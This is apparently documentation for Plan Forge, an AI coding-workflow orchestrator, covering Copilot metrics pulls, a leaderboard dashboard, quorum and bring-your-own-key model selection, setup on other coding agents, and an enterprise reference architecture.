Fetch and cache the latest Copilot Metrics API payload with:
pforge github metrics pull
By default this targets the org inferred from git remote get-url origin. Override with --org <name>. For enterprise-level metrics, use --enterprise <slug>. The pull authenticates via the gh CLI; run gh auth status first if you see a 401.
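Inferring the org from a remote URL might look like the sketch below. How Plan Forge performs this step is not documented here; `orgFromRemote` is a hypothetical helper that handles the common HTTPS and SSH forms of a github.com remote.

```javascript
// Extracts the owner (org or user) from a github.com remote URL.
// Handles the common HTTPS and SSH forms; returns null for anything else.
function orgFromRemote(url) {
  const match = url
    .trim()
    .match(
      /^(?:https:\/\/github\.com\/|git@github\.com:|ssh:\/\/git@github\.com\/)([^/]+)\/[^/]+?(?:\.git)?\/?$/
    );
  return match ? match[1] : null;
}
```

A null result is the case where passing --org explicitly would be needed.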
Additional flags:
| Flag | Default | Effect |
|---|---|---|
--team <slug> | (all teams) | Filter to a single team slug. Repeatable for multiple teams. |
--since <ISO-date> | 30 days ago | Start of the pull window. Metrics API returns daily buckets. |
--out <path> | .forge/metrics/copilot-<date>.jsonl | Override the output path. Use - to print to stdout. |
--no-cache | (cache enabled) | Force a fresh API fetch even if a cached response exists. |
Each line written to .forge/metrics/ is a JSON object with a stable _schema field so downstream consumers (dashboards, CI scripts, forge_github_metrics) can handle forward evolution without breakage:
{
  "_schema": "copilot-metrics/v1",
  "date": "2026-05-05",
  "org": "acme",
  "team": "platform",
  "ai_pr_rate": 0.74,
  "acceptance_rate": 0.61,
  "code_review_usage": 0.43,
  "active_users": 18,
  "_pulled_at": "2026-05-05T11:00:00Z"
}
The schema version follows <namespace>/v<N>. A bump to v2 will only happen when a field is removed or renamed; adding fields is non-breaking. Consumers should read _schema and warn (not crash) on unknown versions. The pforge-mcp/metrics-schema.mjs module exports CURRENT_SCHEMA, validateRow(row), and migrateRow(row) for any tool that reads the JSONL files.
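A consumer that follows the warn-don't-crash advice could be sketched as below. It deliberately does not use the metrics-schema.mjs exports, whose exact signatures are not shown here; `readMetrics` and `KNOWN_SCHEMAS` are hypothetical names for illustration.

```javascript
const KNOWN_SCHEMAS = new Set(["copilot-metrics/v1"]);

// Hypothetical reader: parses JSONL text, keeps every row, and collects a
// warning (instead of throwing) for rows with an unrecognised _schema.
function readMetrics(jsonlText) {
  const rows = [];
  const warnings = [];
  jsonlText.split("\n").forEach((line, index) => {
    if (line.trim() === "") return; // tolerate blank lines and a trailing newline
    const row = JSON.parse(line);
    if (!KNOWN_SCHEMAS.has(row._schema)) {
      warnings.push(`line ${index + 1}: unknown schema ${row._schema}`);
    }
    rows.push(row);
  });
  return { rows, warnings };
}
```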
The dashboard sidebar organises tabs into two groups:
gh auth status returns non-zero or no pull has been run yet.
The Metrics Leaderboard tab sits at the top of the GitHub group. It renders a table of teams ranked by a composite score, a weighted blend of AI-assisted PR rate (40 %), acceptance rate (40 %), and code-review usage (20 %), next to their Plan Forge plan-completion rate for the same window. Hovering a row reveals the raw daily time-series chart.
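The composite score is a plain weighted sum. The sketch below applies the 40/40/20 weights to a single row using the JSONL field names; whether Plan Forge scores daily rows or an aggregate over the window is not stated, so treat the per-row form and the `rankTeams` helper as assumptions.

```javascript
// Weights from the description above: 40 % / 40 % / 20 %.
const WEIGHTS = { ai_pr_rate: 0.4, acceptance_rate: 0.4, code_review_usage: 0.2 };

function compositeScore(row) {
  return Object.entries(WEIGHTS).reduce(
    (sum, [field, weight]) => sum + weight * row[field],
    0
  );
}

// Hypothetical ranking helper: highest composite score first.
function rankTeams(rows) {
  return rows
    .map((row) => ({ team: row.team, score: compositeScore(row) }))
    .sort((a, b) => b.score - a.score);
}
```

For a row with rates 0.74, 0.61, and 0.43, the score works out to 0.4 × 0.74 + 0.4 × 0.61 + 0.2 × 0.43 = 0.626.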
Tab group placement is controlled by the group field in pforge-mcp/dashboard/tab-registry.mjs. Tabs with group: "github" are hidden when the GitHub group is collapsed (the user preference persists in localStorage).
Readiness widget (v2.90.8). The top of the Metrics Leaderboard tab now renders a compact readiness widget that mirrors the eight checks from pforge github status as coloured glyphs. When all eight checks pass the widget collapses to a single ✓ summary line to keep the leaderboard table in view. The widget is served by the new GET /api/github/readiness endpoint and refreshes automatically when the MCP server restarts or when pforge github status writes a new snapshot to .forge/github-status.json.
forge_github_metrics MCP tool
forge_github_metrics exposes the leaderboard data to any MCP client (Copilot Chat, Claude Code, Cursor). It reads from the cached JSONL in .forge/metrics/; it never calls the GitHub API directly, so it works offline and in air-gapped environments after an initial pull.
// In Copilot Chat or any MCP client:
forge_github_metrics({ team: "platform", since: "2026-04-01" })
Input schema:
| Field | Type | Default | Description |
|---|---|---|---|
| team | string or string[] | (all teams) | Filter by team slug(s). |
| since | ISO date string | 30 days ago | Start of the aggregation window. |
| metric | "all", "ai_pr_rate", "acceptance_rate", or "code_review_usage" | "all" | Return only the specified metric column. |
| format | "leaderboard", "timeseries", or "raw" | "leaderboard" | leaderboard = ranked table; timeseries = per-team daily arrays; raw = unprocessed JSONL rows. |
The tool is registered in pforge-mcp/server.mjs alongside forge_github_status and is listed in pforge-mcp/tools.json. It is included in the Plan Forge MCP server entry in .vscode/mcp.json without requiring a separate setup run; the tool registration is additive and picked up on the next MCP server restart.
The dashboard's GET /api/metrics/leaderboard endpoint serves the aggregated leaderboard from the on-disk JSONL cache. It does not proxy the GitHub API on demand. Cache staleness is controlled by two settings in .forge.json:
{
  "metrics": {
    "cacheTtlMinutes": 60,
    "staleWarningMinutes": 480
  }
}
- cacheTtlMinutes (default: 60): the dashboard appends a Cache-Control: max-age=<N×60> header. Browsers and CDNs respect this. The in-process in-memory cache is also flushed after this window, so a fresh request re-reads from disk.
- staleWarningMinutes (default: 480 = 8 hours): if the newest JSONL row is older than this, the leaderboard tab shows a ⚠ Data may be stale banner with the age and a one-click Re-pull button that runs pforge github metrics pull in the background.
Set cacheTtlMinutes: 0 to disable the in-memory cache entirely (reads from disk on every request). Useful in CI environments where the JSONL files are updated by a scheduled workflow and you want every page load to reflect the latest data.
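The two settings translate into a header value and an age check. In this sketch the helper names are hypothetical, and using a row's _pulled_at timestamp as the age of the newest row is an assumption; the dashboard may measure age differently.

```javascript
// Cache-Control value for a TTL given in minutes (the header carries seconds).
function cacheControl(cacheTtlMinutes) {
  return `max-age=${cacheTtlMinutes * 60}`;
}

// True when the newest row is older than the stale-warning window.
// `newestPulledAt` is an ISO timestamp such as a row's _pulled_at (assumed).
function isStale(newestPulledAt, now, staleWarningMinutes) {
  const ageMinutes =
    (now.getTime() - new Date(newestPulledAt).getTime()) / 60000;
  return ageMinutes > staleWarningMinutes;
}
```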
The leaderboard joins Metrics API rows (keyed by GitHub team slug) with Plan Forge plan-completion rows (keyed by the team field in the plan frontmatter). In practice these two key spaces often diverge: a GitHub team might be platform-eng while the plan frontmatter uses platform.
Plan Forge resolves the join using the following precedence order:
.forge.json#metrics.teamMap, highest precedence. Map GitHub team slugs to plan team labels:
{
  "metrics": {
    "teamMap": {
      "platform-eng": "platform",
      "fe-core": "frontend"
    }
  }
}
-eng / -team / -squad, replace hyphens with underscores. If the normalised forms match, the rows are joined.
—, and vice versa. No silent data loss; mismatches are surfaced explicitly.
Run pforge github metrics pull --dry-run to see a join-preview table: every Metrics API team slug listed next to the plan team label it resolves to, and a no match flag for unresolved rows. This makes it easy to build up the teamMap incrementally.
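The join precedence can be sketched as follows. The explicit teamMap lookup comes straight from the text; the normalisation step is a reconstruction that assumes the -eng / -team / -squad suffixes are stripped before hyphens become underscores. Both function names are hypothetical.

```javascript
// Assumed normalisation, reconstructed from the second rule above:
// drop a trailing -eng / -team / -squad, then turn hyphens into underscores.
function normaliseTeam(name) {
  return name.replace(/-(eng|team|squad)$/, "").replace(/-/g, "_");
}

// Hypothetical resolver: returns the plan team label for a GitHub team
// slug, or null when nothing matches (surfaced as "no match").
function resolvePlanTeam(slug, teamMap, planTeams) {
  // 1. An explicit teamMap entry wins.
  if (Object.prototype.hasOwnProperty.call(teamMap, slug)) return teamMap[slug];
  // 2. Otherwise compare normalised forms.
  const target = normaliseTeam(slug);
  const hit = planTeams.find((label) => normaliseTeam(label) === target);
  // 3. Unresolved rows are reported, never silently dropped.
  return hit === undefined ? null : hit;
}
```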
Prerequisite: gh CLI must be authenticated (gh auth status) and the repo's org must have Copilot Metrics API access enabled (requires GitHub Copilot Business or Enterprise). Run pforge github status to verify the GitHub stack readiness before pulling metrics.
GitHub Copilot ships a built-in multi-model picker that lets individual developers switch between supported models (GPT-4o, Claude Sonnet, Gemini, and others) inside their editor. Plan Forge has its own orthogonal model-selection surface: the --model flag and the quorum system. This section explains how the two compose, when BYOK (bring-your-own-key) matters, and when the picker is enough.
--model flag
Every plan-execution command accepts a --model flag that overrides the default model for the entire run:
pforge run-plan docs/plans/Phase-28-PLAN.md --model gpt-4.1
pforge run-plan docs/plans/Phase-28-PLAN.md --model claude-sonnet-4.5
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-3
The value is forwarded to the Forge-Master reasoning layer (pforge-master/src/reasoning.mjs), which resolves it against the configured provider table in .forge.json#providers. If no provider entry exists for the requested model, Forge-Master falls back to the default provider and logs a warn event to the timeline.
The flag is independent of the Copilot multi-model picker. A developer can have GPT-4o selected in their editor picker while Plan Forge runs a plan with --model claude-sonnet-4.5. The two selections do not interfere, Copilot Chat and Plan Forge use separate request paths.
auto, power, speed, and false
For high-stakes slices (deploy steps, schema migrations, security patches), Plan Forge can run the same slice prompt across multiple models and require a threshold of agreement before committing. This is the quorum system.
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=power # flagship models, threshold 5
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=speed # fast models, threshold 7
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=auto # Plan Forge picks mode per slice
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=false # disable quorum entirely
| Mode | Models polled | Agreement threshold | Best for |
|---|---|---|---|
| power | Up to 3 flagship models (GPT-5, Claude Opus, Grok-4) | 5 / 7 points | Deploy slices, schema migrations |
| speed | Up to 3 fast models (GPT-4.1, Claude Haiku, Grok-3-mini) | 7 / 7 points | High-volume code generation, CI budget caps |
| auto | Plan Forge selects per slice based on slice risk tags | Per-slice | Mixed plans; recommended default |
| false | Single model only | N/A | Local development, cost sensitivity |
Cost estimates for each mode are available before you run by calling forge_estimate_quorum (MCP) or running:
pforge run-plan --estimate docs/plans/Phase-28-PLAN.md
This prints a projected cost breakdown under each of the four quorum modes, sourced from the live token-price table in pforge-mcp/cost/price-table.mjs, not hand-computed approximations.
BYOK is the practice of supplying your own API key directly to a model provider rather than routing through GitHub Copilot's proxy. Plan Forge supports BYOK for any provider that exposes an OpenAI-compatible endpoint. Set the key in .forge/secrets.json (gitignored) or via environment variable:
# .forge/secrets.json (gitignored)
{
"XAI_API_KEY": "xai-...",
"ANTHROPIC_API_KEY": "sk-ant-...",
"OPENAI_API_KEY": "sk-..."
}
# Or as environment variables:
export XAI_API_KEY=xai-...
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-4
BYOK matters in the following situations:
XAI_API_KEY and they become available to --model and quorum.
pforge run-plan --estimate to compare.
The Copilot multi-model picker is the right tool when a human developer is choosing a model interactively for chat or inline suggestions. Plan Forge model selection (--model, quorum) is the right tool when an automated plan execution run needs reproducible, auditable model routing with cost tracking and agreement enforcement. The two are complementary:
pforge run-plan execution (CI or local), lock the model via --model or quorum so the run is reproducible across machines.
.forge.json#providers. The Copilot picker setting has no effect on headless plan runs.
.forge.json
The full provider table lives under .forge.json#providers. Each entry maps a model identifier to a provider, base URL, and optional per-model settings:
{
  "providers": {
    "default": "githubCopilot",
    "models": {
      "gpt-5.4": { "provider": "githubCopilot" },
      "claude-sonnet-4.6": { "provider": "githubCopilot" },
      "grok-4": { "provider": "xai", "baseUrl": "https://api.x.ai/v1" },
      "grok-3": { "provider": "xai", "baseUrl": "https://api.x.ai/v1" },
      "grok-3-mini": { "provider": "xai", "baseUrl": "https://api.x.ai/v1" }
    }
  }
}
The internal provider key for GitHub Copilot is "githubCopilot" (not "github-copilot"). Using the wrong key causes selectProvider to return null and fall through to the default. Run pforge smith to validate your provider table and surface misconfiguration before a plan run.
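The lookup-with-fallback behavior can be sketched against the provider table shape shown above. `resolveModel` is a hypothetical stand-in, not the real selectProvider; it only illustrates falling back to the default provider with a warning when a model has no entry.

```javascript
// Hypothetical resolver over the .forge.json#providers shape shown above.
// Returns the provider entry for a model, or the default provider plus a
// warning when the model has no entry.
function resolveModel(model, providers) {
  const entry = providers.models && providers.models[model];
  if (entry) return { model, ...entry, warning: null };
  return {
    model,
    provider: providers.default,
    warning: `no provider entry for ${model}; using default ${providers.default}`,
  };
}
```

Surfacing the fallback as a warning rather than an error matches the described behavior of logging a warn event and continuing.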
Tip: Run pforge smith (forge environment diagnostics) and pforge github status together before any quorum run. smith validates the provider table and API keys; github status confirms the GitHub stack readiness. Both must pass before a power-quorum run on a deploy slice.
Plan Forge runs against any agent, not just GitHub Copilot. This section covers the three most common alternatives: Claude Code, Cursor, and Codex. For each platform it describes what works out of the box, what requires one extra step, and what is GitHub-only and therefore not available outside GitHub Copilot.
The honest framing is a depth-of-integration spectrum. Plan Forge has its deepest automated path on GitHub Copilot (Sections 1–7). The platforms below share the platform-independent subset of that surface, and each diverges in one or two specific areas. None of these gaps block Plan Forge from running end-to-end.
Before covering the per-platform differences, here is the shared foundation that works identically on all four platforms (Copilot, Claude Code, Cursor, Codex):
| Capability | How it works on any platform |
|---|---|
| pforge run-plan execution | The CLI dispatcher, quorum system, validation gates, and trajectory capture all run in-process. No agent platform is required; the CLI is the runtime. |
| AGENTS.md context | Generated by setup.sh / setup.ps1 alongside copilot-instructions.md. All four platforms read AGENTS.md for project architecture, quick commands, and pipeline reference. |
| .github/instructions/*.instructions.md | Instruction files are referenced directly from plan prompts and the Step-2 hardener. The agent platform consuming the prompt sees them via file inclusion, regardless of which IDE or agent is active. |
| BYOK model selection | The --model flag and .forge/secrets.json API keys work the same on all platforms. Any agent can execute a plan run with any model. |
| MCP tools (where MCP is supported) | Claude Code and Cursor both support MCP. They can call forge_run_plan, forge_analyze, forge_estimate_quorum, and the other 102 MCP tools directly from chat. Codex does not support MCP today. |
Claude Code is Anthropic's terminal-native agentic coding environment. Of the three platforms covered in this section, it has the closest feature parity with GitHub Copilot for Plan Forge purposes, for two reasons: it supports MCP natively, and it reads AGENTS.md on every session start.
After running setup.sh (or setup.ps1), Plan Forge's MCP server is registered in .vscode/mcp.json. Claude Code reads MCP configuration from a separate file at ~/.claude/mcp.json (global) or .claude/mcp.json (per-project). Copy the Plan Forge entry across:
# Extract the Plan Forge MCP entry from VS Code's config and write it to Claude Code's config
pforge setup --agent claude
The --agent claude flag (available from setup.sh and setup.ps1) writes a Claude-compatible MCP config file at .claude/mcp.json alongside the standard VS Code config. Once the MCP server is registered, all 36 Plan Forge tools are available from Claude Code's chat interface.
| Feature | Status | Notes |
|---|---|---|
| pforge run-plan (CLI) | ✓ full | Identical to Copilot; the CLI runs independently of the agent platform. |
| MCP tools in chat | ✓ full | Run pforge setup --agent claude once to register the server. |
| AGENTS.md context | ✓ full | Claude Code reads AGENTS.md natively on session start. |
| Instruction files (.github/instructions/) | ✓ full | Referenced via prompt includes; Claude Code sees them through file read calls. |
| BYOK model selection | ✓ full | Set ANTHROPIC_API_KEY in .forge/secrets.json or environment. |
| Copilot Coding Agent dispatch (--worker copilot-coding-agent) | ✗ GitHub-only | Requires GitHub Copilot Coding Agent, which is a GitHub product. Not applicable when using Claude Code as the primary agent. |
| GHAS / CodeQL integration (pforge plan-from-sarif) | ✓ full | SARIF parsing is CLI-only and works regardless of agent platform. The GHAS API calls require gh CLI and a GitHub-hosted repo. |
| Copilot Spaces sync (pforge sync-spaces) | ✗ GitHub-only | Copilot Spaces is a GitHub product. Not applicable outside GitHub Copilot. |
With the MCP server registered, the full Plan Forge surface is available from Claude Code's chat:
"Call forge_run_plan on docs/plans/Phase-28-PLAN.md with quorum=auto and tell me the projected cost first."
Claude Code will call forge_estimate_quorum, present the cost breakdown, then, with confirmation, call forge_run_plan. The execution loop, trajectory capture, and dashboard updates all behave identically to a Copilot Chat invocation.
Cursor is an AI-first code editor built on VS Code. It reads AGENTS.md as a cross-agent context document and supports MCP via the same .vscode/mcp.json that Plan Forge already writes. In most cases, Cursor requires no additional setup after setup.ps1 / setup.sh: the VS Code MCP config is the Cursor MCP config.
Cursor also reads its own rule files from .cursor/rules/. If your repo has a .cursor/rules/ directory, you can mirror the most critical Plan Forge instruction files there. Plan Forge does not write to .cursor/rules/ automatically, but the setup flag generates the directory with recommended stubs:
pforge setup --agent cursor
This creates .cursor/rules/plan-forge.mdc with a condensed version of the architecture principles, pipeline reference, and quick-command list, the subset most useful for inline suggestions and Agent mode. The file is a stub you can extend; Plan Forge does not overwrite it on subsequent pforge update runs.
| Feature | Status | Notes |
|---|---|---|
| pforge run-plan (CLI) | ✓ full | Run from Cursor's integrated terminal, identical to any terminal. |
| MCP tools in Agent mode | ✓ full | Cursor reads .vscode/mcp.json; no extra config needed after setup. |
| AGENTS.md context | ✓ full | Cursor reads AGENTS.md for cross-agent context. |
| Cursor rules (.cursor/rules/) | ⚠ optional | Run pforge setup --agent cursor to generate stub rules. Not required but improves inline suggestion quality. |
| BYOK model selection | ✓ full | Cursor has its own model picker; Plan Forge's --model flag is independent and applies to CLI/MCP invocations. |
| Copilot Coding Agent dispatch | ✗ GitHub-only | Not applicable when using Cursor as the primary agent. |
| GHAS / CodeQL integration | ✓ full | CLI-based; works from Cursor's terminal. |
| Copilot Spaces sync | ✗ GitHub-only | Copilot Spaces is a GitHub product. |
Cursor + Copilot combination: Many teams use Cursor as their primary editor while keeping GitHub Copilot active for PR reviews and the Copilot Chat panel. In this setup, Plan Forge serves both surfaces: Cursor gets MCP tools and .cursor/rules/ context, while Copilot gets instruction files and prompt files via the .github/ directory. Both share the same AGENTS.md and .vscode/mcp.json.
Codex is OpenAI's cloud-based coding agent. It operates as a sandboxed execution environment that clones your repository, reads AGENTS.md for context, executes tasks, and opens a PR with the results, a workflow that parallels GitHub Copilot Coding Agent's dispatch loop described in Section 3.
pforge setup --agent codex
The --agent codex flag ensures AGENTS.md is present and well-formed (Codex is strict about its format), and creates the setup file at .github/codex-setup-steps.yml if it does not already exist. The setup file tells Codex how to bootstrap the repo environment (install dependencies, set environment variables, run initial checks) before it begins executing tasks.
Codex does not support MCP, so it cannot call Plan Forge tools from chat. Instead, Plan Forge dispatches to Codex by writing the slice prompt into a task file and passing it through the Codex task interface. The equivalent of --worker copilot-coding-agent for Codex is:
pforge run-plan --worker codex docs/plans/my-feature-PLAN.md
This generates a task description for each slice (same structure as the Copilot Coding Agent issue body, minus the GitHub-issue wrapper), submits it to the Codex API, polls for the resulting PR, and captures the trajectory, identical to the Copilot Coding Agent dispatch loop except the delivery mechanism is the Codex API rather than the GitHub Issues API.
Prerequisites: the OPENAI_API_KEY must be set in .forge/secrets.json or as an environment variable, and the repo must be connected to the Codex environment (done once via pforge setup --agent codex).
| Feature | Status | Notes |
|---|---|---|
| pforge run-plan (CLI) | ✓ full | CLI runs independently; identical behavior. |
| Cloud dispatch (--worker codex) | ✓ full | Requires OPENAI_API_KEY and pforge setup --agent codex. |
| AGENTS.md context | ✓ full | Codex reads AGENTS.md as its primary context document. Keep this file up to date with pforge update. |
| MCP tools in chat | ✗ not supported | Codex does not support MCP today. Plan Forge tools are available only via pforge run-plan CLI and the Codex dispatch loop. |
| BYOK model selection | ✓ full | Set OPENAI_API_KEY; use --model gpt-5.4 etc. |
| GHAS / CodeQL integration | ✓ full | CLI-based SARIF parsing works regardless of agent. GHAS API requires gh CLI and a GitHub-hosted repo. |
| Copilot Spaces sync | ✗ GitHub-only | Copilot Spaces is a GitHub product. |
Codex vs Copilot Coding Agent (choosing between dispatch workers): Both workers clone the repo, execute the slice, and open a PR. The practical difference is auth surface: --worker copilot-coding-agent requires a GitHub Copilot Coding Agent seat; --worker codex requires an OpenAI API key. If your org has both, prefer copilot-coding-agent for repos already on GitHub, because the PR telemetry, trajectory capture, and Copilot Activity tab integration are deeper. Use --worker codex when the primary model preference is GPT-class and Copilot Coding Agent is not enabled at the org level.
| Feature | GitHub Copilot | Claude Code | Cursor | Codex |
|---|---|---|---|---|
| pforge run-plan CLI | ✓ | ✓ | ✓ | ✓ |
| MCP tools in chat | ✓ | ✓ | ✓ | ✗ |
| AGENTS.md context | ✓ | ✓ | ✓ | ✓ |
| Cloud dispatch worker | copilot-coding-agent | n/a | n/a | codex |
| GHAS / SARIF integration | ✓ | ✓ | ✓ | ✓ |
| Copilot Spaces sync | ✓ | ✗ | ✗ | ✗ |
| GitHub Metrics API leaderboard | ✓ | ⚠ CLI pull only | ⚠ CLI pull only | ⚠ CLI pull only |
| One-step setup | setup.sh | setup.sh --agent claude | setup.sh --agent cursor | setup.sh --agent codex |
Reading the table: ✓ = works fully; ⚠ = works with one extra step or reduced depth; ✗ = not available on this platform. No row marked ✗ prevents pforge run-plan from executing end-to-end.
This chapter was written by Plan Forge. Sections 3, 4, 5, 6, 7, and 8 were drafted by pforge run-plan dispatching to GitHub Copilot via the gh-copilot worker; Sections 1 and 2 were written manually. Each worker-drafted section is a captured slice trajectory you can audit.
Section 9 itself, the artifact you're reading now, is the dogfood of the dogfood: a single live --worker copilot-coding-agent dispatch against this same repository, captured at runtime.
| Section | Plan | Worker | Cost | Trajectory |
|---|---|---|---|---|
| 1, 2 (readiness + 8 primitives) | Phase GITHUB-A plan on GitHub | Manual (small surface) | $0.00 | d7e9cf8 |
| 3, 4 (Coding Agent + GHAS) | Phase GITHUB-B plan on GitHub | gh-copilot worker | $0.07 | fb39b4d + 9 slice commits |
| 6 (Metrics API) | Phase GITHUB-D plan on GitHub | gh-copilot worker | $0.04 | 28fe1ef + 7 slice commits |
| 5, 7, 8 (Spaces + BYOK + other agents) | Phase GITHUB-C plan on GitHub | gh-copilot worker | $0.05 | 7e14d34 + 4 slice commits |
| 9 (this section) | Dogfood plan on GitHub (per runbook on GitHub) | copilot-coding-agent worker (real dispatch) | $0.01 | Issue #150 + bb56040 |
Total spend to write this chapter: $0.17 across the worker-executed slices listed above. The dispatch pipeline for --worker copilot-coding-agent is verified end-to-end against this repo; once Copilot Coding Agent is enabled at the repo level, re-running the dogfood plan should round-trip a full Issue → PR → merge cycle in a single command.
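The total can be cross-checked against the per-row costs in the table. The short sketch below sums them with exact decimal arithmetic; the dictionary keys are shorthand for the table's Section column.

```python
from decimal import Decimal

# Per-row costs copied from the table above (USD).
slice_costs = {
    "1, 2": Decimal("0.00"),
    "3, 4": Decimal("0.07"),
    "6": Decimal("0.04"),
    "5, 7, 8": Decimal("0.05"),
    "9": Decimal("0.01"),
}

total = sum(slice_costs.values(), Decimal("0"))
print(f"${total}")  # $0.17
```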
Using Spec Kit with this repo? Plan Forge can auto-import your spec.md, plan.md, tasks.md, and constitution.md directly into a Crucible smelt, no re-specifying needed.
See the Spec Kit Interop chapter for the complete field-mapping reference, import procedure, and ecosystem extension details.

The landing page for enterprise evaluators, reference architecture, GitHub stack alignment, operator playbook, compliance reference, and the map of where to find every enterprise answer.
Audience: Platform leads, security architects, and engineering managers evaluating Plan Forge for multi-team deployment in regulated or large-scale environments.
TL;DR: Plan Forge is the open-source AI-SDLC orchestrator for teams whose code lives on GitHub. It is local-first by design (no Plan Forge SaaS plane), composes cleanly with Microsoft Foundry and other enterprise model gateways, and ships the orchestration layer GitHub explicitly leaves to the ecosystem.
Most "AI-SDLC" tools today are point solutions: a code completion in the IDE, an autonomous agent that opens one PR, a code reviewer that comments on PRs. Plan Forge is the layer above those, a plan-driven, gate-enforced, cost-tracked, multi-slice orchestration framework that turns a feature spec into a series of validated commits.
Three structural choices make it enterprise-fit:
gen_ai.* semantic conventions are first-class. No proprietary file formats, no vendor lock-in, no "you must use our cloud."
This page is a map. Each link goes to the document that answers a specific enterprise concern.
| You're asking | Read |
|---|---|
| What does a 5-team Plan Forge deployment look like? | Reference Architecture |
| How does Plan Forge compose with Microsoft Foundry / Azure OpenAI in our tenant? | Reference Architecture — Microsoft-shop variant |
| How does Plan Forge align with the GitHub stack we already pay for? | GitHub Stack Alignment (Appendix H), and the deeper Plan Forge on the GitHub Stack (Appendix I) |
| How do we onboard 12 squad members on Day 1? | Agent Factory Recipe |
| You're asking | Read |
|---|---|
| What does Day 1 / Week 4 / Week 12 look like for a team adopting Plan Forge? | Fleet Operator Playbook |
| How do we run Plan Forge across N teams with shared visibility? | Fleet Operator Playbook — Multi-Team |
| What metrics should we track? | Fleet Operator Playbook — KPIs |
| You're asking | Read |
|---|---|
| What gets logged, where, in what format, and how do we export it for audit? | Compliance and Data Residency |
| Where does our source code go when we run Plan Forge? | Compliance — Data Flow |
| Can we run Plan Forge fully air-gapped? | Compliance — Air-Gapped |
| Does Plan Forge work with Azure Government? | Compliance — Azure Government |
| What about HIPAA, FedRAMP, SOC2, PCI? | Compliance — Compliance Posture |
| You're asking | Read |
|---|---|
| How does authentication work today? | Compliance — Identity |
| What's the roadmap for Entra ID / SAML / SCIM? | Compliance — Roadmap |
| You're asking | Read |
|---|---|
| Can we ship Plan Forge traces to Splunk / Datadog / Application Insights? | Compliance — Observability Export |
| You're asking | Read |
|---|---|
| How do we estimate cost for a plan before running it? | Fleet Operator Playbook — Cost Discipline |
| How do we attribute cost to teams and engineers? | Fleet Operator Playbook — Cost Attribution |
We are deliberate about lanes. Plan Forge is not:
localhost:3100. Customers own their deployment top to bottom.
If you have 30 minutes:
If you have 90 minutes:
If you want to run it:
Plan Forge is built on five non-negotiables that show up in every layer:
.github/instructions/architecture-principles.instructions.md)
gen_ai.*, adopt, don't invent
Customers can read the same instruction files Plan Forge agents read. Nothing is hidden. The framework is the documentation.
Plan Forge is open source (MIT). Support model is honest:
forge_meta_bug_file lets agents file defects against Plan Forge itself when they encounter them, and the project is dogfooded against itself.
For enterprises that need a commercial relationship, the right pattern today is to use Plan Forge directly and engage your usual platform-services partner (Microsoft FDE, Slalom, Accenture, etc.) for integration work.

One canonical architecture for a 5-team / 1000-developer fleet, plus the Microsoft Foundry composition variant for Azure-tenant deployments.
Audience: Platform architects and security engineers planning a multi-team Plan Forge deployment.
Scope: Generic enterprise architecture (Pattern A) and the Microsoft Foundry composition variant (Pattern B). Plus three network/isolation patterns including the air-gapped option that's a structural differentiator.
Three constraints shape every architecture below:
gen_ai.* semantic conventions. No proprietary file formats.
| Component | Owns | Does not own |
|---|---|---|
| Developer workstation | Local plan execution, IDE-time orchestration, the dashboard, all .forge/ artifacts | Multi-team aggregation, long-running compute |
| GitHub Enterprise | Source of truth for repos, issues, PRs. Hosts Copilot Cloud Agent runs. Runs Actions workflows | Plan-level orchestration. Quality / eval / drift detection |
| Actions runners | Long-running plan execution, scheduled pforge run-plan jobs, fleet-scale dispatch | Interactive developer-loop workflows |
| OTel collector + backend | All trace, metric, and log aggregation across teams | Real-time agent control |
| LLM provider | Inference for worker LLM calls | Plan state, scope enforcement, gate validation |
.forge/runs/<id>/ locally and emitted to the OTel collector for fleet aggregation.
pforge diff) checks scope-contract adherence before merge.
For customers running on Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes as the SDLC orchestrator layer above Foundry's model gateway and agent runtime.
https://{resource}.openai.azure.com/openai/v1/. Auth via Entra ID (recommended), API key, or managed identity. Customer configures deployment names, not model families.
gen_ai.* spec). Pointed at the Foundry-attached Application Insights resource, Plan Forge runs show up in the same dashboards as Foundry agent runs.
deploy.instructions.md and the skill system include /staging-deploy and similar skills that target Foundry deployment paths.
# Entra ID (keyless) authentication against the Azure OpenAI v1 endpoint
from azure.identity import DefaultAzureCredential, get_bearer_token_provider
from openai import OpenAI

token_provider = get_bearer_token_provider(
    DefaultAzureCredential(), "https://ai.azure.com/.default"
)
client = OpenAI(
    base_url="https://YOUR-RESOURCE.openai.azure.com/openai/v1/",
    api_key=token_provider,  # callable that returns a fresh bearer token
)
Required role assignment on the Foundry resource: Cognitive Services OpenAI User or Contributor.
eastus-prod-mini).
gpt-5.1, gpt-4.1 family, o3-mini, gpt-4o). Use the power-gov quorum preset (or graceful fallback) when targeting Azure Government.
Plan Forge is structurally compatible with all three. Pattern 3 is the differentiator: Cursor cannot offer this (control plane in AWS), Sourcegraph Amp explicitly cannot (no self-host, no BYOK), and GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.
For a team of ~50 developers running ~3 plans/day per developer:
| Resource | Estimate |
|---|---|
| Plan Forge orchestrator processes | One per active developer, low CPU/memory (Node.js process, dashboard at :3100) |
| GitHub Actions minutes (CCA-dispatched plans) | ~15K min/month (varies wildly by plan complexity) |
| LLM tokens (mixed-mode quorum) | ~50M input + 10M output per team-month at moderate use |
| Storage (.forge/runs/ retention) | ~5GB / team / quarter at typical detail |
| OTel trace volume | ~100K spans / team / day |
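To make the sizing figures easier to sanity-check, the sketch below derives a rough per-plan token budget from them. The 21 working days per month is an assumption introduced here for illustration, not a figure from this manual, so treat the results as order-of-magnitude only.

```python
# Figures from the text and table above.
developers = 50
plans_per_dev_per_day = 3
input_tokens_per_month = 50_000_000
output_tokens_per_month = 10_000_000

# Assumption (not from the manual): about 21 working days per month.
working_days_per_month = 21

plans_per_month = developers * plans_per_dev_per_day * working_days_per_month
input_per_plan = input_tokens_per_month / plans_per_month
output_per_plan = output_tokens_per_month / plans_per_month

print(plans_per_month)         # 3150
print(round(input_per_plan))   # 15873
print(round(output_per_plan))  # 3175
```

Under these assumptions a typical plan consumes on the order of 16K input tokens and 3K output tokens. A team whose plans run well above that should expect the monthly estimate to scale accordingly.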
.forge.json per repo or per team
| Failure | Detection | Mitigation |
|---|---|---|
